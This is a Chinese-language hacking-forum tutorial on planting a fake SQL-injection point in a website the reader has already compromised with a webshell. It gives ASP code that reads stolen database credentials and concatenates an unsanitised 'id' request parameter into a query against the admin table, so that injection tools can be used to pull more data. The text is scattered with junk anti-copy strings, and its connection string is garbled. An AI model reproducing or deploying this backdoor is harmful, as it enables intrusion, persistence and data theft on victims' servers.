自己构造注入点方便入侵

admin

自己构造注入点方便入侵
1 s: y& K8 o$ A$ P: `' z1 j3 i% R
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点，然后方便渗透，找到更多的可利用的信息
0 s- B' i3 g0 w" `
这两天一直考试，想了下，就先仍出来，有什么问题可以提出来，我们一起讨论！
  I) A- B. s/ O1 P" P: K+ f) X# S
首先你要拿了一个webshell，这样你找到连接数据库的文件，大多都是conn.asp这个文件里面有mssql的用户和

, b$ n6 ?6 S$ L6 k4 W密码，你要找到用户名、密码、数据库所在的IP，然后连接上去，至于连接大家应该都会，找到网站管理员的表

因为我测试的时候是用管理员的表，我朋友说任何表名都可以，只要这个表存在，代码如下：

程序代码
. ^0 e- P% n3 {" d6 j<!--#include file="xx.asp"-->
; G6 l8 t4 `1 L" P+ g8 V6 |<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
  {1 l+ {4 K( w. g, Q9 B9 wrs.open strSQL,conn,1,3
0 k: V, g' D: j+ A" `rs.close
) R7 b& s' S+ j6 a* \%>

( ]3 k) y4 A! P( Y把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名，注意必须存在
' x* z& {. t3 _, H6 s% A( @/ a
8 K6 d, Q/ Y, T# E你可以连接上去看下表名就是了！这里假设的是admin是表名！这个文件名随便保存！

2 t: H' g5 A& o8 J然后就要构造一个连接数据库的文件了，代码如下：
程序代码
4 I8 v9 S! Q7 S( g2 @0 m* _  r+ F- L<%        
% J/ R* U- w5 astrSQLServerName = "000.000.000.000"     '服务器名称或地址
) R% v. w) m% R5 Q6 ^$ Y6 f4 r6 ustrSQLDBUserName = "sqlname"         '数据库帐号
7 v% S3 E' {! M9 p$ t; D3 |strSQLDBPassword = "sqlpass"         '数据库密码
9 J% @5 F/ J% mstrSQLDBName = "sqldataname"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
! O! P7 _/ G8 F. O3 OstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
  ^  P7 C  R3 X% lconn.open strCon
%>
; w0 G' m" V, n  E2 l1 k
* e( L$ g1 o8 s: u" Y这里应该都会了，就不罗嗦了，不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话，

就这样，正常情况下，就OK了，伪造成功……

           如果有什么问题可以提出来大家一起探讨解决。